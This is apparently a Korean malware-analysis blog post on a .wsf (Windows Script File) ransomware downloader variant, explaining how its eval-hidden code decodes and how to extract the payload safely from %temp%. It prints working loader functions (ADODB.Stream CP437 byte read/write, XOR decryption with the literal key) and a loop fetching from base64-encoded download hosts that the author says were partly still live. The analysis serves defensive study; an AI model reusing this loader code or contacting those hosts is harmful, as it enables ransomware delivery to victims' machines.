

wsf(Windows Script File) 랜섬웨어 변종



.wsf 파일의 코드가 변경된 점이 확인되었다




간략히 보면


<?xml?>

<package>

<job id='JIBST'>

<script language='JScript'><![CDATA[


pereimenovalVpereimenovalPICHrodmands.create = function(){



시작해서



try{


pereimenovalVpereimenovalPICH_a2("http://"+pereimenovalVpereimenovalPICH_a5[docha].pereimenovalVpereimenovalPICH_t1() + "?vgfftDc=BJMHccMSI","hNgOkc");

}catch(pereimenovalVpereimenovalPICH_a3){}

}


 

 ]]></script></job></package>



끝나는 구조이다



코드 하단 부분을 보면 


eval(cipacipa); 이 확인된다

기존처럼 콘솔로그로 변경하면 에러가 확인된다




구글 검색해 보니 CDATA 오류로 확인되었다

//<![CDATA[ 코드 //]]> 형태로 주석 처리하든지, 그냥 <script> 만 남기고 다 지우든지 하면 해결된다


eval(cipacipa); 디코딩 확인 결과, 기존과 비슷하게 MZ 로 파일 형식을 바꾸는 듯한 코드가 확인된다


// Reads the whole file at filePath and returns its contents as an array of
// byte values. The stream is opened as TEXT (type=2) with Charset 437, so the
// file is surfaced as a string in which every byte appears as its CP437
// character; the PICHfsta helper below maps those characters back to byte
// values. This is the "binary read through a text stream" trick script
// droppers use because JScript under WSH has no native binary file API.
// Analyst note: ADODB.Stream + Charset=437 inside a .wsf/.js is a useful
// heuristic for this loader family and a good detection-rule candidate.
function pereimenovalVpereimenovalPICHrtfta(filePath)

{

    // ADODB.Stream obtained through WScript.CreateObject is the only file I/O primitive used here
    var pereimenovalVpereimenovalTRADrosteks=WScript["CreateObject"]("ADODB.Stream");

    pereimenovalVpereimenovalTRADrosteks["type"]=2;   // 2 = adTypeText

    pereimenovalVpereimenovalTRADrosteks["Charset"]=437;   // CP437 (OEM US): single-byte, so one character per input byte

    pereimenovalVpereimenovalTRADrosteks["open"]();

    pereimenovalVpereimenovalTRADrosteks["LoadFromFile"](filePath);

    // NOTE(review): ReadText is read as a property (no parentheses); JScript's
    // COM dispatch invokes the method on plain access, so fileString should hold
    // the whole text -- confirm in a WSH sandbox.
    var fileString=pereimenovalVpereimenovalTRADrosteks["ReadText"];

    pereimenovalVpereimenovalTRADrosteks["close"]();

    // CP437 string -> array of byte values (see PICHfsta)
    return pereimenovalVpereimenovalPICHfsta(fileString);

};

// Converts a string that was decoded as CP437 back into the byte values it
// came from. Code units below 128 are ASCII and pass through unchanged; the
// rest are looked up in t1, which maps the Unicode code point of each CP437
// character 0x80-0xFF to that byte value (e.g. U+00C7 'Ç' -> 0x80,
// U+00A0 -> 0xFF). Returns a plain Array of numbers, in input order.
// The loader also uses this on a literal 32-character string to build its
// XOR key (see the module-level pereimenovalVpereimenovalTRAxKey).
// Note: t1 is a sparse Array, so a code point >= 128 that is not in the
// table yields undefined, which is pushed as-is.
function pereimenovalVpereimenovalPICHfsta(fileString)

{   

// t1: Unicode code point -> CP437 byte (0x80..0xFF); the inverse of t2 in PICHfats
var t1=new Array();

t1[0xC7]=0x80;t1[0xFC]=0x81;t1[0xE9]=0x82;t1[0xE2]=0x83;t1[0xE4]=0x84;t1[0xE0]=0x85;t1[0xE5]=0x86;t1[0xE7]=0x87;t1[0xEA]=0x88;t1[0xEB]=0x89;t1[0xE8]=0x8A;t1[0xEF]=0x8B;t1[0xEE]=0x8C;t1[0xEC]=0x8D;t1[0xC4]=0x8E;t1[0xC5]=0x8F;t1[0xC9]=0x90;t1[0xE6]=0x91;t1[0xC6]=0x92;t1[0xF4]=0x93;t1[0xF6]=0x94;t1[0xF2]=0x95;t1[0xFB]=0x96;t1[0xF9]=0x97;t1[0xFF]=0x98;t1[0xD6]=0x99;t1[0xDC]=0x9A;t1[0xA2]=0x9B;t1[0xA3]=0x9C;t1[0xA5]=0x9D;t1[0x20A7]=0x9E;t1[0x192]=0x9F;t1[0xE1]=0xA0;t1[0xED]=0xA1;t1[0xF3]=0xA2;t1[0xFA]=0xA3;t1[0xF1]=0xA4;t1[0xD1]=0xA5;t1[0xAA]=0xA6;t1[0xBA]=0xA7;t1[0xBF]=0xA8;t1[0x2310]=0xA9;t1[0xAC]=0xAA;t1[0xBD]=0xAB;t1[0xBC]=0xAC;t1[0xA1]=0xAD;t1[0xAB]=0xAE;t1[0xBB]=0xAF;t1[0x2591]=0xB0;t1[0x2592]=0xB1;t1[0x2593]=0xB2;t1[0x2502]=0xB3;t1[0x2524]=0xB4;t1[0x2561]=0xB5;t1[0x2562]=0xB6;t1[0x2556]=0xB7;t1[0x2555]=0xB8;t1[0x2563]=0xB9;t1[0x2551]=0xBA;t1[0x2557]=0xBB;t1[0x255D]=0xBC;t1[0x255C]=0xBD;t1[0x255B]=0xBE;t1[0x2510]=0xBF;t1[0x2514]=0xC0;t1[0x2534]=0xC1;t1[0x252C]=0xC2;t1[0x251C]=0xC3;          

t1[0x2500]=0xC4;t1[0x253C]=0xC5;t1[0x255E]=0xC6;t1[0x255F]=0xC7;t1[0x255A]=0xC8;t1[0x2554]=0xC9;t1[0x2569]=0xCA;t1[0x2566]=0xCB;t1[0x2560]=0xCC;t1[0x2550]=0xCD;t1[0x256C]=0xCE;t1[0x2567]=0xCF;t1[0x2568]=0xD0;t1[0x2564]=0xD1;t1[0x2565]=0xD2;t1[0x2559]=0xD3;t1[0x2558]=0xD4;t1[0x2552]=0xD5;t1[0x2553]=0xD6;t1[0x256B]=0xD7;t1[0x256A]=0xD8;t1[0x2518]=0xD9;t1[0x250C]=0xDA;t1[0x2588]=0xDB;t1[0x2584]=0xDC;t1[0x258C]=0xDD;t1[0x2590]=0xDE;t1[0x2580]=0xDF;t1[0x3B1]=0xE0;t1[0xDF]=0xE1;t1[0x393]=0xE2;t1[0x3C0]=0xE3;t1[0x3A3]=0xE4;t1[0x3C3]=0xE5;t1[0xB5]=0xE6;t1[0x3C4]=0xE7;t1[0x3A6]=0xE8;t1[0x398]=0xE9;t1[0x3A9]=0xEA;t1[0x3B4]=0xEB;                                                              

t1[0x221E]=0xEC;t1[0x3C6]=0xED;t1[0x3B5]=0xEE;t1[0x2229]=0xEF;t1[0x2261]=0xF0;t1[0xB1]=0xF1;t1[0x2265]=0xF2;t1[0x2264]=0xF3;t1[0x2320]=0xF4;t1[0x2321]=0xF5;t1[0xF7]=0xF6;t1[0x2248]=0xF7;t1[0xB0]=0xF8;t1[0x2219]=0xF9;t1[0xB7]=0xFA;t1[0x221A]=0xFB;t1[0x207F]=0xFC;t1[0xB2]=0xFD;t1[0x25A0]=0xFE;t1[0xA0]=0xFF;

// output: one number per input code unit
var resultArray=new Array();

for (var Tj=0; Tj < fileString["length"]; Tj++)

{

var OVc9=fileString["charCodeAt"](Tj);

// ASCII range is identical in CP437 and Unicode, so no lookup needed
if (OVc9 < 128)

{var HIi3=OVc9;}

else

{var HIi3=t1[OVc9];}   // undefined if the code point is not a CP437 character

resultArray["push"](HIi3);

};

return resultArray /* y  */;

};

// Inverse of PICHfsta: turns an array of byte values back into the string a
// CP437 text stream would produce for those bytes. Values below 128 become
// the same ASCII character; 0x80-0xFF are looked up in t2, which maps each
// CP437 byte to the Unicode code point of its glyph (e.g. 0x80 -> U+00C7).
// Characters are collected in an array and joined once at the end.
// The result is what PICHsatt writes through a Charset=437 text stream, so
// the bytes land on disk unchanged.
// Note: like t1, t2 is sparse; a value >= 256 would map to undefined and
// String.fromCharCode(undefined) yields "\u0000".
function pereimenovalVpereimenovalPICHfats(codeArray)

{

    // t2: CP437 byte (0x80..0xFF) -> Unicode code point
    var t2=new Array();

t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89]=0x00EB;t2[0x8A]=0x00E8;t2[0x8B]=0x00EF;t2[0x8C]=0x00EE;t2[0x8D]=0x00EC;t2[0x8E]=0x00C4;t2[0x8F]=0x00C5;t2[0x90]=0x00C9;t2[0x91]=0x00E6;t2[0x92]=0x00C6;t2[0x93]=0x00F4;t2[0x94]=0x00F6;t2[0x95]=0x00F2;t2[0x96]=0x00FB;t2[0x97]=0x00F9;t2[0x98]=0x00FF;t2[0x99]=0x00D6;t2[0x9A]=0x00DC;t2[0x9B]=0x00A2;t2[0x9C]=0x00A3;t2[0x9D]=0x00A5;t2[0x9E]=0x20A7;t2[0x9F]=0x0192;t2[0xA0]=0x00E1;t2[0xA1]=0x00ED;t2[0xA2]=0x00F3;t2[0xA3]=0x00FA;t2[0xA4]=0x00F1;t2[0xA5]=0x00D1;t2[0xA6]=0x00AA;t2[0xA7]=0x00BA;t2[0xA8]=0x00BF;t2[0xA9]=0x2310;t2[0xAA]=0x00AC;t2[0xAB]=0x00BD;t2[0xAC]=0x00BC;t2[0xAD]=0x00A1;t2[0xAE]=0x00AB;t2[0xAF]=0x00BB;t2[0xB0]=0x2591;t2[0xB1]=0x2592;t2[0xB2]=0x2593;t2[0xB3]=0x2502;t2[0xB4]=0x2524;t2[0xB5]=0x2561;t2[0xB6]=0x2562;t2[0xB7]=0x2556;t2[0xB8]=0x2555;t2[0xB9]=0x2563;t2[0xBA]=0x2551;t2[0xBB]=0x2557;t2[0xBC]=0x255D;t2[0xBD]=0x255C;t2[0xBE]=0x255B;t2[0xBF]=0x2510;t2[0xC0]=0x2514;t2[0xC1]=0x2534;t2[0xC2]=0x252C;t2[0xC3]=0x251C;t2[0xC4]=0x2500;t2[0xC5]=0x253C;t2[0xC6]=0x255E;t2[0xC7]=0x255F;t2[0xC8]=0x255A;t2[0xC9]=0x2554;t2[0xCA]=0x2569;t2[0xCB]=0x2566;t2[0xCC]=0x2560;t2[0xCD]=0x2550;t2[0xCE]=0x256C;t2[0xCF]=0x2567;t2[0xD0]=0x2568;t2[0xD1]=0x2564;t2[0xD2]=0x2565;t2[0xD3]=0x2559;t2[0xD4]=0x2558;t2[0xD5]=0x2552;t2[0xD6]=0x2553;t2[0xD7]=0x256B;t2[0xD8]=0x256A;t2[0xD9]=0x2518;t2[0xDA]=0x250C;t2[0xDB]=0x2588;t2[0xDC]=0x2584;t2[0xDD]=0x258C;t2[0xDE]=0x2590;t2[0xDF]=0x2580;t2[0xE0]=0x03B1;t2[0xE1]=0x00DF;t2[0xE2]=0x0393;t2[0xE3]=0x03C0;t2[0xE4]=0x03A3;t2[0xE5]=0x03C3;t2[0xE6]=0x00B5;t2[0xE7]=0x03C4;t2[0xE8]=0x03A6;t2[0xE9]=0x0398;t2[0xEA]=0x03A9;t2[0xEB]=0x03B4;t2[0xEC]=0x221E;t2[0xED]=0x03C6;t2[0xEE]=0x03B5;t2[0xEF]=0x2229;t2[0xF0]=0x2261;t2[0xF1]=0x00B1;t2[0xF2]=0x2265;t2[0xF3]=0x2264;t2[0xF4]=0x2320;t2[0xF5]=0x2321;t2[0xF6]=0x00F7;t2[0xF7]=0x2248;t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;
t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;

// per-character pieces, joined once at the end
var EGj=new Array();

var resultString="";

var HIi3; var OVc9;

for (var Tj=0; Tj < codeArray["length"]; Tj++)

{

HIi3=codeArray[Tj];

// ASCII passes through; everything else goes through the CP437 table
if (HIi3 < 128) 

{OVc9=HIi3;}

else 

{OVc9=t2[HIi3];}

EGj.push(String["fromCharCode"](OVc9));

}

resultString=EGj["join"]("");

return resultString;

};

// Writes an array of byte values to filePath. Mirror image of PICHrtfta: the
// bytes are first turned into their CP437 string form (PICHfats) and then
// written through a TEXT stream with Charset 437, so each character is
// stored as exactly the original byte. Returns nothing.
// Analyst note: this is the step that puts the decoded payload on disk; the
// destination path comes from the caller, which is not shown here (the post
// reports it ends up under %temp%).
function pereimenovalVpereimenovalPICHsatt(filePath, codeArray)

{

    var pereimenovalVpereimenovalTRADrosteks=WScript["CreateObject"]("ADODB.Stream");

    pereimenovalVpereimenovalTRADrosteks["type"]=2;   // 2 = adTypeText

    pereimenovalVpereimenovalTRADrosteks["Charset"]=437;   // CP437: one character per byte, same as the reader         

    pereimenovalVpereimenovalTRADrosteks["open"]();

    // bytes -> CP437 string -> stream
    pereimenovalVpereimenovalTRADrosteks["writeText"](pereimenovalVpereimenovalPICHfats(codeArray));

    pereimenovalVpereimenovalTRADrosteks["SaveToFile"](filePath, 2);   // 2 = adSaveCreateOverWrite: replaces an existing file

    pereimenovalVpereimenovalTRADrosteks["close"]();

};

 

// XORs every element of the byte array in place with a repeating key and
// returns the same array (the caller's array is mutated, not copied).
// The key is the module-level pereimenovalVpereimenovalTRAxKey, an array of
// byte values produced by PICHfsta from a 32-character literal; key byte
// Tj % key.length is used for position Tj. The Math.floor call is a no-op,
// since % on two integers already yields an integer.
// Analyst note: this is the whole "decryption" of the downloaded blob --
// a single-byte-rotating XOR -- which is why the post can recover the MZ
// file once the key string is known.
function pereimenovalVpereimenovalPICHxdac(pereimenovalVpereimenovalPICHcca)

{

for (var Tj=0; Tj < pereimenovalVpereimenovalPICHcca["length"]; Tj++)

{

pereimenovalVpereimenovalPICHcca[Tj] ^= pereimenovalVpereimenovalTRAxKey[Math.floor(Tj % pereimenovalVpereimenovalTRAxKey.length)];

}

return pereimenovalVpereimenovalPICHcca;

};



근데 URL 부분이 안 보인다. 확인해 보니 코드 맨 하단 부분에 별도로 존재하고 있었다

base64 디코딩하면 경로가 확인된다 

* 일부 URL이 살아있어 특정 주소는 생략


// XOR key used by PICHxdac: the 32-character literal is run through
// PICHfsta, so the key is an array of 32 byte values.
var pereimenovalVpereimenovalTRAxKey = pereimenovalVpereimenovalPICHfsta("uZLeHn3bGrJfKHgkCIGZhxOsgV0Io1WC");

// Download hosts, base64-encoded so they do not appear in plain text; the
// post notes some were still live and deliberately leaves them undecoded.
var pereimenovalVpereimenovalPICH_a5 = ["d3d3Lm1ldGVvZXJiYS5pdC8wMmJqSkJIRHM=","c2Vpbnljby5lcy8wMmJqSkJIRHM=","d3d3LnBsYW5ldGsuaXQvMDJiakpCSERz"]; 

// for...in over an Array: docha takes the index strings "0", "1", "2";
// it is never declared with var, so it becomes an implicit global.
for(docha in pereimenovalVpereimenovalPICH_a5){


// Each host is tried in turn. PICH_t1 (presumably the base64 decoder, added
// to String.prototype) and PICH_a2 (the fetch/run routine) are defined
// outside this excerpt. The author replaced the query string with "생략".
try{


pereimenovalVpereimenovalPICH_a2("http://"+pereimenovalVpereimenovalPICH_a5[docha].pereimenovalVpereimenovalPICH_t1() + "?생략","hNgOkc");

// Empty catch: a failed host is silently skipped and the loop moves on to
// the next one, so the loader survives dead URLs.
}catch(pereimenovalVpereimenovalPICH_a3){}

}



그럼 URL 도 확인했고, 다운받은 파일에 수학적 코드가 입혀지고 MZ 형태로 변경된 후 실행을 시키는 부분을 찾아서 주석 처리하면

이미 알고 있는 %temp% 폴더에서 최종파일만 건지면 끝 !!

즉, Run 은 pereimenovalVpereimenovalPICHpromises 요놈이다




pereimenovalVpereimenovalPICHpromises 코드에 주석 처리만 추가하고 .wsf 파일을 실행하면 감염 없이 파일 획득이 가능하다

* 참고로 기존처럼 .js 로 바꾸고 실행했더니 에러가 확인되는 걸 보면 .wsf 에서만 동작되는 코드가 있나 보다








- 16.08.17 wsf 변종파일 확인 -





